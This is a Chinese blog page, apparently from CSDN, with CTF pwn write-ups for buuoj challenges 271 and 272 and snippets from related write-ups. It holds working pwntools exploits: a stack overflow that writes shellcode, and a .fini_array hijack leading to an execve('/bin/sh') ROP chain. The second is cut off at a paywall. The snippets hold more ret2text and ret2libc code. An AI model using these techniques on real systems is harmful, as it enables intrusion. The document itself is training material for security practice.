buuoj Pwn writeup 271-275

最新推荐文章于 2022-05-22 12:56:23 发布
原创 最新推荐文章于 2022-05-22 12:56:23 发布 · 421 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细探讨了栈溢出漏洞及其利用技术,包括如何利用scanf后的缓冲区回车来影响gets函数,以及如何通过精心构造的payload实现远程代码执行。此外,还分析了两道CTF题目,涉及半开RELRO下的.fini_array劫持、offbynull利用,以及通过内存管理漏洞进行堆操作。文章深入讲解了漏洞利用过程,并提供了相关的exploit代码示例。

271 espcially_tu_2016

在这里插入图片描述
在这里插入图片描述就是一个栈溢出。

在这里插入图片描述在这里插入图片描述

但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。

然后做了个小实验。
setvbuf

exp

from pwn import *
context(os='linux', arch='i386',log_level='debug')
r = remote("node4.buuoj.cn",27739)
#r = process("./271")

elf = ELF("./271")
libc = ELF("./32/libc-2.23.so")

gets_plt = elf.plt['gets']
bss_addr = 0x804a060

payload = 'a' * 36 + 'a' * 8 + p32(gets_plt) + p32(gets_plt) + p32(bss_addr) + p32(bss_addr)

r.sendlineafter("What's your name?\n", payload)
r.sendlineafter("What's your favorite number?\n", "1")

r.sendline(asm(shellcraft.sh()))

r.interactive()

272 pwnable_317

在这里插入图片描述
会发现RELRO是半开的,但是其实因为这道题是静态链接,所以我们还是可以劫持.fini_array。

开始读程序。
在这里插入图片描述
我们可以任意地址写,但是长度只有0x18个字节,并不足以进行利用。
所以我们考虑劫持fini_array进行多次任意写。
然后制造rop。

但是我们要注意,这个程序的fini_array数组有两个。
在这里插入图片描述所以只能跑两个函数。

exp

from pwn import*

r = remote("node4.buuoj.cn", 29087)

context.log_level = "debug"

fini_array = 0x4B40F0
main_addr = 0x401B6D
libc_csu_fini = 0x402960
esp = fini_array + 0x10
leave_ret = 0x401C4B
ret = 0x401016
 
rop_syscall = 0x471db5
rop_pop_rax = 0x41e4af
rop_pop_rdx = 0x446e35
rop_pop_rsi = 0x406c30
rop_pop_rdi = 0x401696
bin_sh_addr = 0x4B419A
 
def write(addr,data):
    r.recv()
    r.send(str(addr))
    r.recv()
    r.send(data)
 

write(fini_array,p64(libc_csu_fini) + p64(main_addr))
 
write(bin_sh_addr,"/bin/sh\x00")
write(esp,p64(rop_pop_rax))
write(esp+8,p64(0x3b))
write(esp+16,p64(rop_pop_rdi))
write(esp+24
最低0.47元/天 解锁文章
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 778
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这题多多少少有点问题。 IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 404
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
Buuoj Pwn
VisualNull的博客
05-22 376
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
buuoj pwn
FFY's Blog
10-07 1201
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 363
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 586
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 384
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
BUUOj PWN 121-140
2h4ox1n9
12-17 178
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 613
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 423
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 473
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 359
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2365
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 502
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 573
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 344
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 1101
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
buuoj Pwn writeup 31-40
yongbaoii的博客
02-06 1509
31 [Black Watch 入群题]PWN 这个题有问题,就给了个附件,给的链接nc都连不上,做做题算了。 保护 可以往bss上写东西,然后有个溢出,但是溢出有限,只能覆盖到返回地址。 因为开了NX,所以不能写shellcode,因为溢出有限,所以先想到的是栈迁移。 把栈迁移到bss上,构造ROP,通过write函数泄露libc地址,然后就在bss上一把梭。 写法很多,我这里的话就直接先把’/bin/sh\x00’先写在了bss的位置。 exp from pwn import* from LibcSea
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值